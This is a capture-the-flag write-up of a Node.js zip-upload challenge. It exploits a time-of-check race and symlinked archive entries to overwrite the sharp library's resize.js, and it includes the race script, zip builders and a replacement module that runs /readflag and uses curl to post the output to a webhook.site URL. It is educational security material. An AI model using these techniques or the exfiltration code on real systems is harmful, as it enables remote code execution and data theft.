

app.get('/process', async (req, res) => {
  const name = req.query.name;
  const entryName = req.query.file;
  const startTime = Date.now(); 
  if (!name || !entryName) return res.status(400).send('missing params');
  if (name.includes('..') || name.includes('/') || name.length > 1) {
    // I made some errors here - but still should be solvable :clueless:
    return res.status(400).send('bad zip name');
  }

  const zipPath = path.join(UPLOAD_DIR, `${name}`);
  try {
    const zip = new StreamZip.async({ file: zipPath });
    const entries = await zip.entries();
    for (const [ename, entry] of Object.entries(entries)) {
      const archiveEntryName = ename;

      const unixStyle = String(archiveEntryName).replace(/\\/g, '/');
      if (unixStyle.includes('\0') || /[\x00-\x1f]/.test(unixStyle)) {  
        await zip.close();
        console.log('Bad zip entry (null/control bytes):', archiveEntryName);
        return res.status(400).send('bad zip entry (invalid chars)');
      }
      const normalized = path.posix.normalize(unixStyle);

      if (
        normalized === '' ||
        normalized.startsWith('/') ||
        /^[a-zA-Z]:\//.test(unixStyle) ||
        normalized.split('/').some(seg => seg === '..')
      ) {
        await zip.close();
        console.log('Found path traversal entry:', archiveEntryName);
        return res.status(400).send('bad zip entry (path traversal)');
      }

      const attr = entry && entry.attr ? entry.attr : 0;
      const looksLikeSymlink = (((attr >> 16) & 0xFFFF) & 0o170000) === 0o120000;
      if (looksLikeSymlink) {
        await zip.close();
        console.log('Found symlink via external attributes:', archiveEntryName);
        return res.status(400).send('symlinks not allowed (detected)');
      }

    }
    await zip.close();
  } catch (err) {
    console.log(err);
    return res.status(500).send('check error');
  }
  try {
    if (entryName.includes('..') || entryName.includes('/')) {
      return res.status(400).send('bad entry name');
    }
    const extractDir = path.join(UPLOAD_DIR, `${name}_extracted`);

    if (!fs.existsSync(extractDir)) fs.mkdirSync(extractDir);

    await new Promise(resolve => setTimeout(() => { fs.copyFileSync(zipPath, path.join(extractDir, path.basename(zipPath))); resolve(); }, 1000));
    const unzipResult = spawnSync('unzip', ['-o', path.join(extractDir, path.basename(zipPath))], { cwd: extractDir, timeout: 10000 });
    if (unzipResult.status !== 0) {
      console.log(`Unzip error: ${unzipResult.stderr.toString()}, ${unzipResult.status}`);
      return res.status(500).send('unzip error');
    }

    const entryPath = path.join(extractDir, path.basename(`${entryName}`));
    const contents = fs.readFileSync(entryPath, 'utf8');
    console.log(`Reading entry from path: ${entryPath}`);

    if (!fs.existsSync(entryPath)) {
      return res.status(404).send('entry not found (second check)');
    }
    fs.readFile(entryPath, 'utf8', (err, data) => {
      if (err) return console.error(err);
    });

    if (!entryPath.endsWith('.jpg') && entryName.length > 1) { // if entryName.length = 1 you can read anything
      return res.status(400).send('only .jpg files allowed');
    }

    if (!contents) return res.status(404).send('entry not found');
    return res.type('text/plain').send(contents);
  } catch (err) {
    console.log(err);
    return res.status(500).send('read error');
  }
});

This is the meat of the challenge. In essence, the /process endpoint lets us specify a zip name that is at most one character long. It then opens /tmp/uploads/<name> as a zip file and checks every entry, rejecting null/control bytes, absolute paths, Windows drive letters, '..' path segments, and entries whose external attributes mark them as symlinks.
If the zip passes all these checks, it creates a folder /tmp/uploads/<name>_extracted (if it doesn't already exist), waits for 1 second, copies /tmp/uploads/<name> into that folder and extracts it with unzip -o (overwriting without prompting) under a 10 second timeout.

Lastly, it reads req.query.file (which cannot contain / or ..) from the extraction folder and returns its contents, as long as the name ends in .jpg or is a single character (the !entryPath.endsWith('.jpg') && entryName.length > 1 check).
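For reference, here is an approximate Python port of the per-entry checks (my own translation; Python's posixpath.normpath and Node's path.posix.normalize differ in a few edge cases such as leading double slashes, and I'm assuming entry.attr is the raw zip external-attributes field, as the bit-shifting implies). It shows that the checks only ever look at the zip present at check time: a nested path like helloworld/dangerous_looking_payload.js passes, while a symlink entry is rejected.

```python
import posixpath
import re
import stat

def entry_rejected(name: str, external_attr: int) -> bool:
    """Approximate port of the per-entry checks in /process."""
    unix_style = name.replace("\\", "/")
    if re.search(r"[\x00-\x1f]", unix_style):  # null/control bytes
        return True
    normalized = posixpath.normpath(unix_style)
    if (
        normalized == ""  # kept for fidelity; normpath("") actually returns "."
        or normalized.startswith("/")
        or re.match(r"^[a-zA-Z]:/", unix_style)
        or ".." in normalized.split("/")
    ):
        return True  # path traversal
    mode = (external_attr >> 16) & 0xFFFF  # Unix st_mode sits in the high 16 bits
    return stat.S_IFMT(mode) == stat.S_IFLNK  # symlink

REGULAR = (stat.S_IFREG | 0o644) << 16
SYMLINK = (stat.S_IFLNK | 0o777) << 16

for entry, attr in [
    ("chart/bg.jpg", REGULAR),
    ("helloworld/dangerous_looking_payload.js", REGULAR),
    ("../escape.js", REGULAR),
    ("helloworld", SYMLINK),
]:
    print(f"{entry!r:45} rejected={entry_rejected(entry, attr)}")
```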

Thought Process

A few things stand out immediately.

The folder name in which it stores the extracted files is deterministic. Furthermore, the folder's contents aren't destroyed. This means that we can call the process endpoint multiple times with the same zipfile and the contents of each zipfile will simply be dumped there without fail.
It waits for a full second before copying the zip file over. This is a classic red flag in CTF challenges that tells you, with almost 100% certainty, that a race condition is involved somewhere.
It uses the unzip command with -o. unzip overwrites existing files indiscriminately, and on its own strips '..' path segments and leading '/'. That is safe as long as you extract into an empty folder, and it means the JavaScript path traversal checks don't actually add anything.
Zips can contain symlinks. This is a very common quirk of zip files/archive formats that many ctf challenges use (and can also appear pretty commonly in real life!)
p7zip-full is installed for some reason but never used (spoiler: this is irrelevant to the challenge but I spent quite some time down this rabbit hole :angry:)

Race conditions where some value is checked against a condition and only used later are called TOCTOU (Time Of Check to Time Of Use) vulnerabilities.
However, I personally have never found the acronym appealing.
LiveOverflow has a pretty nice video explaining this class of vulnerabilities on his channel here
Or maybe I'm just a liveoverflow simp...

Anyhow, the first thing that came to my mind was that we could swap out the zip file after the check was done but before it was copied over.

This is possible because the upload endpoint happily overwrites an existing file with the same name, and there is a whole second between the check and the copy.
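The timing window can be reproduced locally with a small Python sketch. A temporary file stands in for /tmp/uploads/A, one thread plays /process (check, wait, then use) and another plays a second /upload with the same name. All names here are illustrative, and a threading.Event replaces a fixed delay so that the ordering is deterministic.

```python
import tempfile
import threading
import time
from pathlib import Path

def checker(path: Path, checked: threading.Event, result: dict) -> None:
    """Plays /process: validate the file, wait, then use it."""
    result["checked"] = path.read_bytes()  # time of check
    checked.set()
    time.sleep(0.5)  # stand-in for the server's 1 s setTimeout
    result["used"] = path.read_bytes()  # time of use (the copy)

def swapper(path: Path, checked: threading.Event) -> None:
    """Plays a second /upload that overwrites the same name."""
    checked.wait()
    path.write_bytes(b"malicious zip")

with tempfile.TemporaryDirectory() as tmp:
    target = Path(tmp) / "A"
    target.write_bytes(b"benign zip")
    checked, result = threading.Event(), {}
    threads = [
        threading.Thread(target=checker, args=(target, checked, result)),
        threading.Thread(target=swapper, args=(target, checked)),
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

print(result)
```

The value that was validated and the value that gets used are different bytes, which is all a TOCTOU bug needs.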

Therefore I wrote this script

import threading
import time

import requests

# B contains the symlink, A contains the file,C will contain the
url = "https://chart-viewer-2234294574f3.instancer.sekai.team"

r = requests.post(url + '/upload', files = {'file': ('A', open('A', 'rb'))}, data = {'name': 'A'})
print(r.text)
print('Uploaded A')

def send_file(files, data):
    time.sleep(0.2)
    print('files:', files)
    print('data:', data)
    r = requests.post(url + '/upload', files=files, data=data)
    print(r.text)


def send_process(data):
    print(data)
    r = requests.get(url + '/process', params=data)
    print(r.text)

thread1 = threading.Thread(target=send_file, args=({'file': ('A', open('zips/A', 'rb'))}, {'name': 'A'}))
thread2 = threading.Thread(target=send_process, args=({'name': 'A', 'file': 'faketmp'},))


thread1.start()
thread2.start()

thread1.join()  #  Wait for completion
thread2.join()

print("Both requests completed, uploaded symlink")

This uploads 'A', calls /process, and 0.2s later uploads another file of my choosing, also named 'A'.

This lets us bypass the whole chunk of entry checks, since they only ever inspect the first zip.

Hurrah! We can now solve the challenge...right? Simply upload a zip containing something like test.jpg, then swap it out with a zip that contains a symlink to /flag.txt.

This is where we hit our first roadblock. We cannot simply read /flag.txt, as it is owned by root and readable only by root. Furthermore, unzip strips all '..' segments and ignores leading '/'s, so we are limited to extracting into the current directory (and its subdirectories).

At this juncture, my initial instinct was that p7zip-full had to be installed for some reason. Perhaps unzip had a lesser known feature that called p7zip whenever it saw a 7z archive?
I then spent the next 30 minutes crawling through the unzip documentation and experimenting with it in hopes of finding such behavior, with no luck.
I'm 99% sure the author installed p7zip-full just to toy with our feelings :shrug:

After some mulling (and spinning in my chair), I realised that by swapping in zip files, we could plant folders that were actually symlinks to other folders!
That is, we could craft a zip file, 'A', with the following structure:

helloworld -> /app

Then, we can extract this zip which leaves us with
/tmp/uploads/A_extracted/helloworld -> /app

After that, we craft another zip file, also named 'A', with the following structure:

helloworld/dangerous_looking_payload.js

When unzipped, this makes unzip write dangerous_looking_payload.js into /tmp/uploads/A_extracted/helloworld, which resolves to /app, so the file lands at /app/dangerous_looking_payload.js.

With this, we have an arbitrary file write anywhere the app user can write, and the challenge should be trivial from here.
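The write primitive itself is ordinary filesystem behaviour: when a path component is a symlink to a directory, opening a file beneath it follows the link. Here is a minimal Python sketch on a temporary directory, where app and A_extracted stand in for /app and /tmp/uploads/A_extracted. It models the second extraction as a plain file write, on the assumption (which the exploit relies on) that unzip writes through the existing symlinked folder rather than replacing it. It needs a Unix-like system for os.symlink.

```python
import os
import tempfile
from pathlib import Path

with tempfile.TemporaryDirectory() as tmp:
    app = Path(tmp) / "app"  # stands in for /app
    extracted = Path(tmp) / "A_extracted"  # stands in for /tmp/uploads/A_extracted
    app.mkdir()
    extracted.mkdir()

    # Stage 1: the first swapped-in zip leaves behind helloworld -> app
    os.symlink(app, extracted / "helloworld", target_is_directory=True)

    # Stage 2: writing helloworld/dangerous_looking_payload.js follows the link
    (extracted / "helloworld" / "dangerous_looking_payload.js").write_text("pwned")

    landed = (app / "dangerous_looking_payload.js").read_text()

print(landed)
```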

Here's a helpful infographic I drew on mspaint :laugh:

Now, which file can we overwrite to get RCE? Conveniently, there is another endpoint in index.js, /render:

app.post('/render', (req, res) => {
  const sharp = require('sharp');

  const contentLength = parseInt(req.headers['content-length'] || '0', 10);
  if (contentLength && contentLength > MAX_UPLOAD_BYTES) return res.status(413).send('file too large');

  let bytes = 0;
  let aborted = false;
  req.on('data', c => {
    bytes += c.length;
    if (bytes > MAX_UPLOAD_BYTES && !aborted) {
      aborted = true;
      req.destroy();
      try { res.status(413).send('file too large'); } catch (e) { }
    }
  });

  const transformer = sharp({ failOnError: true })
    .ensureAlpha()
    .removeAlpha()
    .resize(16, 1, { fit: 'fill' });

  req.pipe(transformer);

  transformer
    .raw()
    .toBuffer({ resolveWithObject: true })
    .then(({ data, info }) => {
      if (aborted) return;
      if (!info || info.channels < 3) return res.status(400).send('unsupported image');

      const channels = info.channels;
      const sampled = [];
      for (let x = 0; x < info.width; x++) {
        const idx = x * channels;
        const r = data[idx];
        const g = data[idx + 1];
        const b = data[idx + 2];
        sampled.push(rgbToHex(r, g, b));
      }
      return res.json({
        controlColors: sampled,
      });
    })
    .catch(err => {
      if (!res.headersSent) {
        console.error('render error', err && err.message ? err.message : err);
        res.status(400).send('image processing error');
      }
      try { transformer.destroy(); } catch (e) { }
      try { req.destroy(); } catch (e) { }
    });

  req.on('close', () => {
    try { transformer.destroy(); } catch (e) { }
  });
});

function rgbToHex(r, g, b) {
  return '#' + [r, g, b].map(v => (v & 0xff).toString(16).padStart(2, '0')).join('');
}

Interestingly, the sharp library is only required upon the first call to /render.
Some digging into the sharp library tells me that it is used for "High performance Node.js image processing".

That made it a promising target to overwrite: its files are only loaded into memory once we call /render, and /render plays no part in the rest of our exploit.
Therefore, I ran npm install and went digging around the library's files.
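Why the lazy require matters can be shown with a Python analogue (my own illustration, not part of the challenge): Python's import system, like Node's require, caches a module after its first load, so overwriting a source file only affects modules that have not been loaded yet. The module names below are hypothetical.

```python
import importlib
import sys
import tempfile
from pathlib import Path

with tempfile.TemporaryDirectory() as tmp:
    sys.path.insert(0, tmp)
    for name in ("demo_eager_dep", "demo_lazy_dep"):
        (Path(tmp) / f"{name}.py").write_text("VALUE = 'original'\n")
    importlib.invalidate_caches()

    # Like index.js's top-level requires: loaded at startup, before the attack
    eager = importlib.import_module("demo_eager_dep")

    # The attacker overwrites both files on disk
    for name in ("demo_eager_dep", "demo_lazy_dep"):
        (Path(tmp) / f"{name}.py").write_text("VALUE = 'overwritten'\n")

    # Like require('sharp') inside /render: first loaded only after the overwrite
    lazy = importlib.import_module("demo_lazy_dep")
    eager_again = importlib.import_module("demo_eager_dep")  # served from sys.modules

    sys.path.remove(tmp)

print(eager_again.VALUE, lazy.VALUE)
```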

I quickly found resize.js, which defines function resize (widthOrOptions, height, options) {, the function behind the .resize(16, 1, { fit: 'fill' }); call.

Therefore, I quickly wrote a new resize.js which looked something like this

function resize (widthOrOptions, height, options) {
  const { execSync } = require('child_process');

  // Execute /readflag and capture stdout
  let stdout = execSync('/readflag', { encoding: 'utf-8' });
  
  // Send the output via curl
  execSync(`curl -X POST -d "${stdout}" https://webhook.site/1a0b2935-9c58-4abe-9410-b00ea9d64a09`);
}

This simply runs /readflag and sends the flag to my webhook.

Flagging

Thus, our exploit is complete.
I used this nifty Python script to create the zip files (the version below builds the third one):

import zipfile

# Build the third stage, saved as zips/A
with open('old_resize.js', 'r') as f:
    resize_js_content = f.read()  # contents to write over sharp's lib/resize.js
with zipfile.ZipFile('zips/A', 'w') as zf:
    # Extracts through the faketmp symlink, i.e. into /app/node_modules/sharp/lib
    zf.writestr('faketmp/resize.js', resize_js_content)

print("Created zips/A with entry faketmp/resize.js")

First, we had 'A'

test.jpg

Next, we had 'A'

faketmp -> /app/node_modules/sharp/lib

Finally, we had 'A'

faketmp/resize.js
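The script above only shows how the final zip was built. Here is a sketch that builds all three stages in memory with Python's zipfile (build_stage and the placeholder contents are hypothetical). The symlink entry works by storing a Unix mode of S_IFLNK | 0777 in the high 16 bits of external_attr, with create_system = 3 marking the entry as made on Unix, and the link target as the entry's data; I'm assuming Info-ZIP's unzip restores such entries as symlinks, which is what the exploit relied on. This is also exactly the bit pattern the /process symlink check looks for, hence the race.

```python
import io
import stat
import zipfile

def build_stage(entries: list) -> bytes:
    """Build an in-memory zip. Each entry is (name, data, is_symlink)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data, is_symlink in entries:
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # "made on Unix", so the mode bits are meaningful
            mode = (stat.S_IFLNK | 0o777) if is_symlink else (stat.S_IFREG | 0o644)
            info.external_attr = mode << 16  # st_mode lives in the high 16 bits
            zf.writestr(info, data)  # a symlink's data is its target path
    return buf.getvalue()

stages = [
    build_stage([("test.jpg", b"placeholder image bytes", False)]),
    build_stage([("faketmp", b"/app/node_modules/sharp/lib", True)]),
    build_stage([("faketmp/resize.js", b"// replacement resize.js goes here", False)]),
]

with zipfile.ZipFile(io.BytesIO(stages[1])) as zf:
    info = zf.infolist()[0]
    print(info.filename, stat.S_ISLNK(info.external_attr >> 16), zf.read(info))
```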

Using our previous overwrite_import.py script, we could then upload each file one by one and overwrite sharp's resize.js.
Next, we simply call /render and win!

Testing this locally worked well

And on remote, we got osu{I_w4nt_mus1c_n3xt_t1m3}

Summary

This was a decently interesting challenge (that could probably serve as a good introduction) about race conditions and symlinks. 7/10